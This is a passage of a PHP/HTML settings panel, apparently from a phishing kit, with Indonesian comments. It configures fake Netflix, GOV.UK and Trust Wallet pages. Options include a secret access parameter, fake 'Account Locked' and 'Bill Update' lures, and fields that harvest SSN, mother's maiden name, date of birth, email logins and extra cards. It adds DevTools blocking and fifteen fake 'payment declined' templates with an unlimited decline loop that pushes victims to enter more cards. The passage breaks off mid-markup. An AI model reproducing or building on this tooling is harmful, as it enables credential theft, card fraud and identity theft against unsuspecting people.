.template-preview .preview-icon.outline {
    display: inline-flex;
    width: 24px;
    height: 24px;
    border: 2px solid var(--accent-red);
    border-radius: 50%;
    align-items: center;
    justify-content: center;
    color: var(--accent-red);
    font-size: 0.8rem;
}

.template-preview .preview-icon.filled {
    display: inline-flex;
    width: 24px;
    height: 24px;
    background: var(--accent-red);
    border-radius: 50%;
    align-items: center;
    justify-content: center;
    color: #fff;
    font-size: 0.8rem;
}

.template-preview .preview-icon.centered {
    display: inline-flex;
    width: 32px;
    height: 32px;
    background: rgba(145, 70, 255, 0.1);
    border-radius: 50%;
    align-items: center;
    justify-content: center;
    color: var(--accent-purple);
    font-size: 1.2rem;
}

.template-preview .preview-msg {
    font-size: 0.75rem;
    font-weight: 700;
    color: #e2e8f0;
}

.template-preview .preview-sub {
    font-size: 0.65rem;
    color: var(--accent-red);
    margin-top: 4px;
}

.template-preview .preview-link {
    font-size: 0.6rem;
    color: var(--accent-blue);
    margin-top: 4px;
}

/* Config Info Bar */
.config-info-bar {
    background: var(--bg-card);
    border: 1px solid var(--border);
    border-radius: 12px;
    padding: 15px 25px;
    margin-bottom: 25px;
    display: flex;
    align-items: center;
    gap: 15px;
    flex-wrap: wrap;
    backdrop-filter: blur(10px);
}

.config-info-bar .config-label {
    font-size: 0.85rem;
    color: var(--text);
    display: flex;
    align-items: center;
    gap: 10px;
    font-weight: 700;
}

.config-info-bar .config-label i {
    color: var(--accent-cyan);
    filter: drop-shadow(0 0 8px rgba(0, 212, 255, 0.5));
}

.config-info-bar .config-item {
    font-size: 0.8rem;
    font-family: 'JetBrains Mono', monospace;
    font-weight: 600;
    padding: 6px 14px;
    border-radius: 8px;
}

.config-info-bar .config-item.green {
    background: rgba(0, 255, 157, 0.1);
    color: var(--accent-green);
    border: 1px solid rgba(0, 255, 157, 0.2);
}

.config-info-bar .config-item.cyan {
    background: rgba(0, 212, 255, 0.1);
    color: var(--accent-cyan);
    border: 1px solid rgba(0, 212, 255, 0.2);
}

.config-info-bar .config-desc {
    font-size: 0.8rem;
    color: var(--text-dim);
}

/* Submit Button */
.btn-submit {
    background: #00f0ff;
    color: #0a0e17;
    border: none;
    padding: 18px 50px;
    border-radius: 14px;
    font-size: 1.1rem;
    font-weight: 800;
    cursor: pointer;
    display: inline-flex;
    align-items: center;
    gap: 12px;
    transition: all 0.3s ease;
    text-transform: uppercase;
    letter-spacing: 1px;
    box-shadow: 0 0 20px rgba(0, 240, 255, 0.3);
}

.btn-submit:hover {
    transform: translateY(-4px);
    background: #33f4ff;
    box-shadow: 0 0 35px rgba(0, 240, 255, 0.5);
}

/* Two Column */
.two-col {
    display: grid;
    grid-template-columns: 1fr 1fr;
    gap: 25px;
}
@media (max-width: 992px) { .two-col { grid-template-columns: 1fr; } }

/* Test Section */
.test-section {
    background: rgba(77, 124, 255, 0.05);
    border: 1px dashed rgba(77, 124, 255, 0.3);
    border-radius: 12px;
    padding: 18px;
    margin-top: 20px;
    display: flex;
    align-items: center;
    gap: 15px;
    flex-wrap: wrap;
}

.test-section .test-label {
    font-size: 0.8rem;
    font-weight: 700;
    color: var(--accent-blue);
    text-transform: uppercase;
}

.btn-test {
    background: rgba(77, 124, 255, 0.15);
    border: 1px solid rgba(77, 124, 255, 0.3);
    color: var(--accent-blue);
    padding: 12px 24px;
    font-size: 0.9rem;
    font-weight: 600;
    border-radius: 8px;
    cursor: pointer;
    display: inline-flex;
    align-items: center;
    gap: 10px;
    transition: all 0.2s;
}

.btn-test:hover { 
    background: rgba(77, 124, 255, 0.25);
    transform: translateY(-2px);
    box-shadow: 0 0 20px rgba(77, 124, 255, 0.25);
}

/* Email Methods */
.email-methods {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
    gap: 20px;
    margin-top: 20px;
}

.email-method {
    background: var(--bg-input);
    border: 1px solid var(--border);
    border-radius: 12px;
    padding: 20px;
    text-align: center;
    transition: 0.3s;
}

.email-method:hover {
    border-color: var(--accent-purple);
    box-shadow: 0 0 20px rgba(168, 85, 247, 0.1);
}

.email-method .name {
    font-size: 0.95rem;
    font-weight: 700;
    color: var(--text);
    margin-bottom: 5px;
}

.email-method .priority {
    font-size: 0.75rem;
    color: var(--text-dim);
    margin-bottom: 12px;
    text-transform: uppercase;
    letter-spacing: 1px;
}

/* Save Container */
.save-container {
    background: #111827;
    border: 1px solid #1e2d4a;
    border-radius: 12px;
    padding: 20px 24px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-top: 24px;
    position: relative;
    overflow: hidden;
    box-shadow: 0 0 15px rgba(0, 240, 255, 0.05);
}

.save-container::before {
    content: '';
    position: absolute;
    top: 0; left: 0; right: 0;
    height: 3px;
    background: #00f0ff;
}

.save-info {
    color: var(--text-dim);
    font-size: 0.82rem;
    display: flex;
    align-items: center;
    gap: 10px;
}

.btn-primary {
    background: #00f0ff !important;
    border: none !important;
    color: #0a0e17 !important;
    font-weight: 600 !important;
    padding: 11px 28px !important;
    border-radius: 8px !important;
    font-size: 0.88rem !important;
    cursor: pointer;
    transition: all 0.2s ease !important;
}

.btn-primary:hover {
    background: #33f4ff !important;
    transform: translateY(-1px) !important;
    box-shadow: 0 0 20px rgba(0, 240, 255, 0.35) !important;
}

.btn-primary:active {
    transform: translateY(0) !important;
}

/* Scrollbar */
::-webkit-scrollbar { width: 6px; height: 6px; }
::-webkit-scrollbar-track { background: #0a0e17; }
::-webkit-scrollbar-thumb { background: #1e2d4a; border-radius: 10px; }
::-webkit-scrollbar-thumb:hover { background: #2a3f6a; }

</style>

<div class="settings-container">
    <!-- Page Header -->
    <div class="page-header">
        <h1><i class="bi bi-gear-fill"></i> Settings Configuration</h1>
    </div>
    
    <!-- Config Files Info -->
    <div class="config-info-bar">
        <span class="config-label"><i class="bi bi-info-circle-fill"></i> Config Files:</span>
        <span class="config-item green">→ gen.json</span>
        <span class="config-desc">= Semua settings tersimpan di satu file (config/gen.json)</span>
    </div>
    
    <?php if ($success): ?>
    <div class="alert-msg success">
        <i class="bi bi-check-circle-fill"></i> <?= htmlspecialchars($success) ?>
    </div>
    <?php endif; ?>
    
    <!-- Template-Specific Settings Banner -->
    <div class="template-bar">
        <div>
            <div class="label"><i class="bi bi-sliders"></i> SETTINGS FOR</div>
            <div class="name" style="color: var(--accent-cyan); font-size: 1.3rem;"><?= htmlspecialchars($activeTemplateName) ?></div>
        </div>
        <div style="text-align: right;">
            <div class="folder">Folder: <?= htmlspecialchars($activeFolder) ?></div>
            <div style="font-size: 0.75rem; color: var(--accent-yellow); margin-top: 3px;">Settings khusus untuk template <b><?= htmlspecialchars($activeTemplateName) ?></b></div>
            <div style="font-size: 0.65rem; color: var(--text-dim); margin-top: 2px;">Ubah template di Control Panel untuk switch settings</div>
        </div>
    </div>
    
    <form method="POST" action="">
        <!-- GOBOT & IPWHOIS - ALWAYS ON (tidak ditampilkan di UI) -->
        <!-- API Keys tersimpan di gen.json -->
        
        <!-- URL PARAMETER SETTINGS -->
        <div class="settings-card gobot">
            <div class="settings-card-header">
                <i class="bi bi-link-45deg icon"></i>
                <span class="title">URL PARAMETER</span>
                <span class="badge">→ ACCESS.JSON</span>
                <span class="template-name">(Contoh: domain.com/?good)</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-3">
                    <div class="form-group">
                        <label class="form-label">PARAMETER STATUS</label>
                        <select name="parameter_status" class="form-select">
                            <option value="1" <?= ($accessConfig['parameter_status'] ?? '0') === '1' ? 'selected' : '' ?>>ON - Wajib Pakai Parameter</option>
                            <option value="0" <?= ($accessConfig['parameter_status'] ?? '0') === '0' ? 'selected' : '' ?>>OFF - Tanpa Parameter</option>
                        </select>
                        <span class="form-hint">Aktifkan untuk wajib akses dengan parameter</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">PARAMETER VALUE</label>
                        <input type="text" name="parameter" class="form-input" 
                               value="<?= htmlspecialchars($accessConfig['parameter'] ?? 'good') ?>" 
                               placeholder="good">
                        <span class="form-hint">Contoh: <code>/?good</code> atau <code>/?secret</code></span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">PREVIEW URL</label>
                        <div style="padding: 12px; background: rgba(0, 255, 157, 0.1); border-radius: 8px; border: 1px solid rgba(0, 255, 157, 0.3); font-family: monospace; font-size: 12px;">
                            <span style="color: var(--accent-green);">domain.com/<strong>?<?= htmlspecialchars($accessConfig['parameter'] ?? 'good') ?></strong></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- ACTIVITY PAGE SETTINGS -->
        <?php if (!in_array($activeTemplate, ['govuk'])): ?>
        <div class="settings-card" style="border-color: rgba(247, 224, 24, 0.2);">
            <div class="settings-card-header" style="background: rgba(247, 224, 24, 0.05);">
                <i class="bi bi-bell-fill icon" style="color: var(--accent-yellow);"></i>
                <span class="title" style="color: var(--accent-yellow);">ACTIVITY PAGE - <?= htmlspecialchars($activeTemplateName) ?></span>
                <span class="badge">→ GEN.JSON</span>
                <span class="template-name">(Setelah Login: Locked / Bill Update)</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-2">
                    <div class="form-group">
                        <label class="form-label">ACTIVITY PAGE</label>
                        <select name="activity_page" class="form-select">
                            <option value="on" <?= ($genConfig['activity_page'] ?? 'on') === 'on' ? 'selected' : '' ?>>ON - Tampilkan Activity</option>
                            <option value="off" <?= ($genConfig['activity_page'] ?? '') === 'off' ? 'selected' : '' ?>>OFF - Langsung ke Form</option>
                        </select>
                        <span class="form-hint">Tampilkan halaman activity setelah login</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">ACTIVITY TYPE</label>
                        <select name="activity_type" class="form-select">
                            <option value="locked" <?= ($genConfig['activity_type'] ?? 'locked') === 'locked' ? 'selected' : '' ?>>🔒 Account Locked</option>
                            <option value="bill-update" <?= ($genConfig['activity_type'] ?? '') === 'bill-update' ? 'selected' : '' ?>>💳 Bill Update Required</option>
                            <option value="activity" <?= ($genConfig['activity_type'] ?? '') === 'activity' ? 'selected' : '' ?>>⚠️ Unusual Activity</option>
                        </select>
                        <span class="form-hint">Jenis halaman activity yang ditampilkan</span>
                    </div>
                </div>
            </div>
        </div>
        <?php endif; ?>
        
        <!-- FORM FIELDS -->
        <?php if (!in_array($activeTemplate, ['govuk', 'trustwallet'])): ?>
        <div class="settings-card form">
            <div class="settings-card-header">
                <i class="bi bi-ui-checks icon"></i>
                <span class="title">FORM FIELDS - <?= htmlspecialchars($activeTemplateName) ?></span>
                <span class="badge">→ GEN.JSON</span>
                <span class="template-name">(<?= htmlspecialchars($activeTemplateName) ?>)</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-6">
                    <div class="form-group">
                        <label class="form-label">DOUBLE CARD</label>
                        <select name="double_card" class="form-select">
                            <option value="off" <?= ($genConfig['double_card'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['double_card'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">DOB</label>
                        <select name="dob" class="form-select">
                            <option value="off" <?= ($genConfig['dob'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['dob'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">SSN</label>
                        <select name="ssn" class="form-select">
                            <option value="off" <?= ($genConfig['ssn'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['ssn'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">MMN</label>
                        <select name="mmn" class="form-select">
                            <option value="off" <?= ($genConfig['mmn'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['mmn'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">CITY</label>
                        <select name="city_status" class="form-select">
                            <option value="off" <?= ($genConfig['city_status'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['city_status'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">MAIL LOGIN</label>
                        <select name="mail_login" class="form-select">
                            <option value="off" <?= ($genConfig['mail_login'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['mail_login'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">SAVE CARD</label>
                        <select name="save_card" class="form-select">
                            <option value="off" <?= ($genConfig['save_card'] ?? '0') === '0' ? 'selected' : '' ?>>OFF</option>
                            <option value="on" <?= ($genConfig['save_card'] ?? '0') === '1' ? 'selected' : '' ?>>ON</option>
                        </select>
                    </div>
                </div>
            </div>
        </div>
        <?php endif; ?>
        
        <!-- CARD SETTINGS -->
        <div class="settings-card card-set">
            <div class="settings-card-header">
                <i class="bi bi-credit-card-fill icon"></i>
                <span class="title">CARD SETTINGS - <?= htmlspecialchars($activeTemplateName) ?></span>
                <span class="badge">→ GEN.JSON</span>
                <span class="template-name">(<?= htmlspecialchars($activeTemplateName) ?>)</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-4">
                    <div class="form-group">
                        <label class="form-label">AMEX CID</label>
                        <select name="amex_cid" class="form-select">
                            <option value="on" <?= ($genConfig['amex_cid'] ?? '1') === '1' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['amex_cid'] ?? '1') === '0' ? 'selected' : '' ?>>OFF</option>
                        </select>
                        <span class="form-hint">CID for Amex</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">VALID UI</label>
                        <select name="valid_ui" class="form-select">
                            <option value="on" <?= ($genConfig['valid_ui'] ?? '1') === '1' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['valid_ui'] ?? '1') === '0' ? 'selected' : '' ?>>OFF</option>
                        </select>
                        <span class="form-hint">Green/Red border</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label highlight">BIN API</label>
                        <select name="bin_api" class="form-select">
                            <option value="on" <?= ($genConfig['bin_api'] ?? '1') === '1' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['bin_api'] ?? '1') === '0' ? 'selected' : '' ?>>OFF</option>
                        </select>
                        <span class="form-hint pink">bin.su + CSV fallback</span>
                    </div>
                    <div class="form-group">
                        <label class="form-label">ANTI-DEV</label>
                        <select name="anti_dev" class="form-select">
                            <option value="on" <?= ($genConfig['anti_dev'] ?? '1') === '1' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['anti_dev'] ?? '1') === '0' ? 'selected' : '' ?>>OFF</option>
                        </select>
                        <span class="form-hint">Block F12/DevTools</span>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- DECLINED CARD TEMPLATE -->
        <?php if (in_array($activeTemplate, ['netflix'])): ?>
        <!-- Netflix: 10 declined templates with preview -->
        <div class="settings-card declined">
            <div class="settings-card-header">
                <i class="bi bi-x-circle-fill icon"></i>
                <span class="title">DECLINED CARD TEMPLATE - <?= htmlspecialchars($activeTemplateName) ?></span>
                <span class="badge">→ GEN.JSON</span>
                <span class="template-name">(Khusus <?= htmlspecialchars($activeTemplateName) ?>)</span>
            </div>
            <div class="settings-card-body">
                <div class="template-selector">
                    <div class="select-col">
                        <div class="form-group">
                            <label class="form-label">TEMPLATE STYLE</label>
                            <select name="declined_template" class="form-select" id="declinedSelect">
                                <option value="1" <?= ($genConfig['declined_template'] ?? '1') === '1' ? 'selected' : '' ?>>1 - Classic Dark</option>
                                <option value="2" <?= ($genConfig['declined_template'] ?? '') === '2' ? 'selected' : '' ?>>2 - Outline Icon</option>
                                <option value="3" <?= ($genConfig['declined_template'] ?? '') === '3' ? 'selected' : '' ?>>3 - Red Header</option>
                                <option value="4" <?= ($genConfig['declined_template'] ?? '') === '4' ? 'selected' : '' ?>>4 - Simple Alert</option>
                                <option value="5" <?= ($genConfig['declined_template'] ?? '') === '5' ? 'selected' : '' ?>>5 - Centered</option>
                                <option value="6" <?= ($genConfig['declined_template'] ?? '') === '6' ? 'selected' : '' ?>>6 - 3D Secure</option>
                                <option value="7" <?= ($genConfig['declined_template'] ?? '') === '7' ? 'selected' : '' ?>>7 - Netflix Border ⭐</option>
                                <option value="8" <?= ($genConfig['declined_template'] ?? '') === '8' ? 'selected' : '' ?>>8 - Netflix Banner ⭐⭐</option>
                                <option value="9" <?= ($genConfig['declined_template'] ?? '') === '9' ? 'selected' : '' ?>>9 - Netflix Inline ⭐</option>
                                <option value="10" <?= ($genConfig['declined_template'] ?? '') === '10' ? 'selected' : '' ?>>10 - Netflix Card ⭐⭐</option>
                                <option value="11" <?= ($genConfig['declined_template'] ?? '') === '11' ? 'selected' : '' ?>>11 - Subscription Alert ⭐⭐</option>
                                <option value="12" <?= ($genConfig['declined_template'] ?? '') === '12' ? 'selected' : '' ?>>12 - Billing Alert Dark ⭐</option>
                                <option value="13" <?= ($genConfig['declined_template'] ?? '') === '13' ? 'selected' : '' ?>>13 - Account Hold ⭐⭐</option>
                                <option value="14" <?= ($genConfig['declined_template'] ?? '') === '14' ? 'selected' : '' ?>>14 - Dark Modal ⭐⭐</option>
                                <option value="15" <?= ($genConfig['declined_template'] ?? '') === '15' ? 'selected' : '' ?>>15 - Checkout Error ⭐</option>
                            </select>
                            <span class="form-hint">15 templates available ⭐ recommended</span>
                        </div>
                        
                        <div class="form-group" style="margin-top: 15px;">
                            <label class="form-label">3D SECURE VERIFICATION</label>
                            <div style="display: flex; align-items: center; gap: 12px; margin-bottom: 10px;">
                                <label class="toggle-switch">
                                    <input type="hidden" name="netflix_3ds_status" value="off">
                                    <input type="checkbox" name="netflix_3ds_status" value="on" <?= ($genConfig['netflix_3ds_status'] ?? 'off') === 'on' ? 'checked' : '' ?>>
                                    <span class="toggle-slider"></span>
                                </label>
                                <span style="font-size: 0.85rem; color: <?= ($genConfig['netflix_3ds_status'] ?? 'off') === 'on' ? '#00ff9d' : '#ff4757' ?>;">
                                    <?= ($genConfig['netflix_3ds_status'] ?? 'off') === 'on' ? 'ON - 3DS aktif setelah kartu diterima' : 'OFF - Langsung tanpa 3DS' ?>
                                </span>
                            </div>
                        </div>
                        
                        <div class="form-group" id="netflix_3ds_options" style="margin-top: 10px; <?= ($genConfig['netflix_3ds_status'] ?? 'off') === 'off' ? 'display:none;' : '' ?>">
                            <label class="form-label">3DS FAILED TEMPLATE</label>
                            <select name="netflix_3ds_template" class="form-select">
                                <option value="1" <?= ($genConfig['netflix_3ds_template'] ?? '1') === '1' ? 'selected' : '' ?>>1 - Classic 3DS Failed</option>
                                <option value="2" <?= ($genConfig['netflix_3ds_template'] ?? '') === '2' ? 'selected' : '' ?>>2 - Shield Warning</option>
                                <option value="3" <?= ($genConfig['netflix_3ds_template'] ?? '') === '3' ? 'selected' : '' ?>>3 - Step Progress</option>
                                <option value="4" <?= ($genConfig['netflix_3ds_template'] ?? '') === '4' ? 'selected' : '' ?>>4 - Dark Mode Lock</option>
                                <option value="5" <?= ($genConfig['netflix_3ds_template'] ?? '') === '5' ? 'selected' : '' ?>>5 - Modal Dialog</option>
                            </select>
                            <span class="form-hint">Pilih style untuk 3DS failed Netflix</span>
                        </div>
                        <script>
                        document.querySelector('input[name="netflix_3ds_status"][type="checkbox"]').addEventListener('change', function() {
                            document.getElementById('netflix_3ds_options').style.display = this.checked ? '' : 'none';
                        });
                        </script>
                        
                        <div class="form-group" style="margin-top: 15px;">
                            <label class="form-label">DECLINED BUTTON STYLE</label>
                            <select name="declined_button_style" class="form-select">
                                <option value="continue" <?= ($genConfig['declined_button_style'] ?? 'continue') === 'continue' ? 'selected' : '' ?>>Continue</option>
                                <option value="update" <?= ($genConfig['declined_button_style'] ?? '') === 'update' ? 'selected' : '' ?>>Update Payment</option>
                                <option value="update_new" <?= ($genConfig['declined_button_style'] ?? '') === 'update_new' ? 'selected' : '' ?>>Update New Payment</option>
                                <option value="both" <?= ($genConfig['declined_button_style'] ?? '') === 'both' ? 'selected' : '' ?>>Continue + Update Payment</option>
                                <option value="both_new" <?= ($genConfig['declined_button_style'] ?? '') === 'both_new' ? 'selected' : '' ?>>Continue + Update New Payment</option>
                            </select>
                            <span class="form-hint">Tombol yang tampil setelah kartu declined</span>
                        </div>
                        
                        <div class="form-group" style="margin-top: 15px;">
                            <label class="form-label">BILLING DECLINED LOOP</label>
                            <select name="billing_declined" class="form-select">
                                <option value="1" <?= ($genConfig['billing_declined'] ?? '1') === '1' ? 'selected' : '' ?>>1x</option>
                                <option value="2" <?= ($genConfig['billing_declined'] ?? '') === '2' ? 'selected' : '' ?>>2x</option>
                                <option value="3" <?= ($genConfig['billing_declined'] ?? '') === '3' ? 'selected' : '' ?>>3x</option>
                                <option value="99" <?= ($genConfig['billing_declined'] ?? '') === '99' ? 'selected' : '' ?>>Unlimited</option>
                            </select>
                        </div>
                        
                        <div class="form-group" style="margin-top: 15px;">
                            <label class="form-label">🔗 REDIRECT COMPLETED LINK</label>
                            <input type="url" name="redirect_link" class="form-input" value="<?= htmlspecialchars($genConfig['redirect_completed_link'] ?? 'https://netflix.com') ?>" placeholder="https://netflix.com">
                            <span class="form-hint">User akan diredirect ke link ini setelah selesai input semua (jika Renewal OFF)</span>
                        </div>
                        
                        <div class="form-group" style="margin-top: 15px;">
                            <label class="form-label">🎨 COLOR MODE</label>
                            <select name="declined_color_mode" class="form-select" id="declinedColorMode" onchange="toggleColorPicker()">
                                <option value="default" <?= ($genConfig['declined_color_mode'] ?? 'default') === 'default' ? 'selected' : '' ?>>🎨 Default (Netflix Asli)</option>
                                <option value="custom" <?= ($genConfig['declined_color_mode'] ?? '') === 'custom' ? 'selected' : '' ?>>⚙️ Custom (Atur Manual)</option>
                            </select>
                            <span class="form-hint">Default = warna bawaan Netflix</span>
                        </div>
                        
                        <div id="customColorSection" style="margin-top: 15px; padding: 16px; background: #1a1a1a; border-radius: 8px; border: 1px solid #333; display: <?= ($genConfig['declined_color_mode'] ?? 'default') === 'custom' ? 'block' : 'none' ?>;">
                            <label class="form-label" style="color: #e50914; margin-bottom: 12px;">🎨 CUSTOM COLOR SETTINGS</label>
                            
                            <div style="display: grid; grid-template-columns: repeat(4, 1fr); gap: 12px;">
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Card Background</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_bg" id="netflixColorBg" value="<?= htmlspecialchars($genConfig['netflix_color_bg'] ?? '#fff4f4') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_bg_text" value="<?= htmlspecialchars($genConfig['netflix_color_bg'] ?? '#fff4f4') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#fff4f4">
                                    </div>
                                </div>
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Error/Accent</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_error" id="netflixColorError" value="<?= htmlspecialchars($genConfig['netflix_color_error'] ?? '#e50914') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_error_text" value="<?= htmlspecialchars($genConfig['netflix_color_error'] ?? '#e50914') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#e50914">
                                    </div>
                                </div>
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Title Text</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_title" id="netflixColorTitle" value="<?= htmlspecialchars($genConfig['netflix_color_title'] ?? '#221f1f') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_title_text" value="<?= htmlspecialchars($genConfig['netflix_color_title'] ?? '#221f1f') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#221f1f">
                                    </div>
                                </div>
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Sub Text</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_sub" id="netflixColorSub" value="<?= htmlspecialchars($genConfig['netflix_color_sub'] ?? '#333333') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_sub_text" value="<?= htmlspecialchars($genConfig['netflix_color_sub'] ?? '#333333') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#333333">
                                    </div>
                                </div>
                            </div>
                            
                            <div style="display: grid; grid-template-columns: repeat(3, 1fr); gap: 12px; margin-top: 12px;">
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Border Color</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_border" id="netflixColorBorder" value="<?= htmlspecialchars($genConfig['netflix_color_border'] ?? '#fcd9d9') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_border_text" value="<?= htmlspecialchars($genConfig['netflix_color_border'] ?? '#fcd9d9') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#fcd9d9">
                                    </div>
                                </div>
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Icon Background</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_icon_bg" id="netflixColorIconBg" value="<?= htmlspecialchars($genConfig['netflix_color_icon_bg'] ?? '#e50914') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_icon_bg_text" value="<?= htmlspecialchars($genConfig['netflix_color_icon_bg'] ?? '#e50914') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#e50914">
                                    </div>
                                </div>
                                <div>
                                    <label style="font-size: 11px; color: #888; display: block; margin-bottom: 4px;">Link/CTA Text</label>
                                    <div style="display: flex; gap: 6px; align-items: center;">
                                        <input type="color" name="netflix_color_link" id="netflixColorLink" value="<?= htmlspecialchars($genConfig['netflix_color_link'] ?? '#0073e6') ?>" style="width: 36px; height: 30px; border: none; border-radius: 4px; cursor: pointer;">
                                        <input type="text" name="netflix_color_link_text" value="<?= htmlspecialchars($genConfig['netflix_color_link'] ?? '#0073e6') ?>" class="form-input" style="flex: 1; font-size: 11px; padding: 6px 8px;" placeholder="#0073e6">
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Quick Presets -->
                            <div style="margin-top: 12px; padding-top: 12px; border-top: 1px solid #333;">
                                <label style="font-size: 11px; color: #888; display: block; margin-bottom: 8px;">Quick Presets:</label>
                                <div style="display: flex; gap: 8px; flex-wrap: wrap;">
                                    <button type="button" onclick="setNetflixPreset('netflix')" style="padding: 6px 12px; background: #e50914; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-size: 11px;">Netflix Default</button>
                                    <button type="button" onclick="setNetflixPreset('dark')" style="padding: 6px 12px; background: #141414; color: #fff; border: 1px solid #333; border-radius: 4px; cursor: pointer; font-size: 11px;">Dark Mode</button>
                                    <button type="button" onclick="setNetflixPreset('light')" style="padding: 6px 12px; background: #f5f5f5; color: #333; border: 1px solid #ddd; border-radius: 4px; cursor: pointer; font-size: 11px;">Light</button>
                                    <button type="button" onclick="setNetflixPreset('disney')" style="padding: 6px 12px; background: #0063e5; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-size: 11px;">Disney+ Style</button>
                                </div>
                            </div>
                            
                            <!-- Live Preview -->
                            <div style="margin-top: 16px; padding: 12px; background: #0a0a0a; border-radius: 8px;">
                                <label style="font-size: 11px; color: #666; display: block; margin-bottom: 8px;">LIVE PREVIEW</label>
                                <div id="netflixPreviewBox" style="background:#fff4f4;border:1px solid #fcd9d9;border-radius:4px;padding:12px">
                                    <div style="display:flex;align-items:flex-start;gap:10px">
                                        <div id="netflixPreviewIcon" style="width:18px;height:18px;background:#e50914;border-radius:50%;display:flex;align-items:center;justify-content:center;flex-shrink:0">
                                            <span style="color:#fff;font-size:10px;font-weight:bold">!</span>
                                        </div>
                                        <div>
                                            <p id="netflixPreviewTitle" style="color:#221f1f;font-size:13px;font-weight:600;margin:0 0 4px">Your payment was declined</p>
                                            <p id="netflixPreviewSub" style="color:#333;font-size:12px;margin:0 0 4px">VISA ending in 4242 was not accepted</p>
                                            <a id="netflixPreviewLink" href="#" style="color:#0073e6;font-size:11px;text-decoration:none">Update payment method</a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                    <div class="preview-col">
                        <div class="template-previews">
                            <!-- Template 1 -->
                            <div class="template-preview">
                                <div class="preview-title">Template 1 - Outline</div>
                                <div class="preview-box">
                                    <div class="preview-icon outline">!</div>
                                    <div class="preview-msg">Payment Method Updated</div>
                                    <div class="preview-sub">✕ Declined: VISA ****1234</div>
                                </div>
                            </div>
                            <!-- Template 2 -->
                            <div class="template-preview">
                                <div class="preview-title">Template 2 - Filled</div>
                                <div class="preview-box">
                                    <div class="preview-icon filled">!</div>
                                    <div class="preview-msg">Payment Method Updated</div>
                                    <div class="preview-sub">✕ Declined: VISA ****1234</div>
                                </div>
                            </div>
                            <!-- Template 3 -->
                            <div class="template-preview">
                                <div class="preview-title">Template 3 - Border Left</div>
